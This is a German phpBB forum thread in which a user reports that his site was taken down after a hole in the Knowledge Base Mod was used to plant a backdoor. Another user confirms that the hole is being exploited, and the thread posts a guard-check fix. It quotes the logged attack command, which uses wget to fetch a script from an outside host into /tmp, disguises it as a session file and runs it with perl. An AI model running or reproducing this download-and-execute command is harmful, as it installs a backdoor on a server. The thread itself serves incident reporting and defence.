Backdoor in Knowledge Base Mod ?

Du hast Probleme beim Einbau oder bei der Benutzung eines Mods? In diesem Forum bist du richtig.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.0, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
Benutzeravatar
redbull254
Ehemaliges Teammitglied
Beiträge: 10379
Registriert: 05.01.2006 13:01
Kontaktdaten:

Backdoor in Knowledge Base Mod ?

Beitrag von redbull254 »

Hallo,zusammen
ich habe mir die Knowledge Base Mod.. installiert. Läuft schon einige Tage, nun heute Nacht die komplette Abschaltung meines Webspace.

Begründung:
wir hatten ein Serverproblem, verursacht durch ihren Account. Dieser
wurde gesperrt. Mittlerweile konnten wir die Ursache ausfindig machen.
Auf dem web befindet sich eine Sicherheitslücke die ausgenutzt wurde um ein
Backdoor zu platzieren:

sh -c cd /tmp;wget http://www.husnaweb.com/borek.txt;mv borek.txt
sess_rdav631df3a1ddfaa34s1x1wwo521459;perl sess_r
/usr/lib/cgi-bin/php4 -c /etc/php4/cgi
/var/www/web184/html/phpBB2/includes/kb_constants.php
Wer kann mir dazu mehr Infos geben?
Beste Grüße
Walter
CorniI
Mitglied
Beiträge: 42
Registriert: 19.05.2006 11:11
Wohnort: Heilbronn

Beitrag von CorniI »

jop, siehe zB hier: http://www.phpbb2.de/ftopic38976.html Wird gerade aktiv exploitet
Benutzeravatar
redbull254
Ehemaliges Teammitglied
Beiträge: 10379
Registriert: 05.01.2006 13:01
Kontaktdaten:

Beitrag von redbull254 »

na, Super :evil:

Klasse programmiert und toller Info Fluß. :-?

Aggrocorni, ich Danke Dir für den Link.


Edit:

Forum nach Einbau von :
if ( !defined(’IN_PHPBB’) )
{
die(”Hacking attempt”);
}
wieder online. :grin:

Und für alle, die auch Probleme befürchten:

http://www.phpbb2.de/rlink/rlink.php?ur ... k.de/?p=33
Beste Grüße
Walter
Antworten

Zurück zu „phpBB 2.0: Mod Support“